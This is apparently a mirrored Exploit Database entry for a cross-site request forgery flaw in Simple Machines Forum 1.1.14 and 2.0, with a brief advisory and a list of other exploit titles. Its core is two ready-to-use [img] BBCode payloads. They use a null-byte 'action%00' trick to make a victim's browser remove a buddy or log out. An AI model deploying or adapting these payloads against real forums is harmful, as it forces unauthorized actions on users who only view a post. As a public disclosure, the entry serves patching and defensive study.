Simple Machines Forum (SMF) 1.1.14/2.0 – ‘[img]’ BBCode Tag Cross-Site Request Forgery

Exploit Database
16 阅读

作者： Christian Yerena

日期： 2011-08-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36083/

source: https://www.securityfocus.com/bid/49311/info

Simple Machines Forum is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.

Simple Machines Forum 2.0 and 1.1.14 are vulnerable; other versions may be affected. 

[img]http://www.example.com/index.php?sa=editBuddies;remove=102;action%00=profile[/img]

[img]http://www.example.com/community/index.php?action%00=logout;token[/img]

last Exploits
Simple Machines Forum (SMF) 1.1.14/2.0 – ‘[img]’ BBCode Tag Cross-Site Request Forgery的更多信息

TVersity 1.9.7 – Arbitrary File Download：
Joomla! Component com_sectionex – Local File Inclusion：
Wiser Backup – Information Disclosure：
PolyPager 1.0rc10 – ‘FCKeditor’ Arbitrary File Upload：
Linksys AX3200 V1.1.00 – Command Injection：
Adult Video Site Script – Multiple Vulnerabilities：
Tilde CMS 1.01 – Multiple Vulnerabilities：
XhP CMS 0.5.1 – Cross-Site Request Forgery / Persistent Cross-Site Scripting：